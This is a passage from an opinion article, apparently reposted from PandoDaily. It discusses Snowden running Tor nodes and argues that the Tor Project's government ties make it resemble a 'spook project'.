too? I reached out to Sandvik for comment. She didn’t reply. But Wired’s Poulsen suggested that running Tor nodes and throwing a crypto party was a pet privacy project for Snowden. “Even as he was thinking globally, he was acting locally.” But it’s hard to imagine a guy with top secret security clearance in the midst of planning to steal a huge cache of secrets would risk running a Tor node to help out the privacy cause. But then, who hell knows what any of this means. I guess it’s fitting that Tor’s logo is an onion — because the more layers you peel and the deeper you get, the less things make sense and the more you realize that there is no end or bottom to it. It’s hard to get any straight answers — or even know what questions you should be asking. In that way, the Tor Project more resembles a spook project than a tool designed by a culture that values accountability or transparency. Sursa: Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily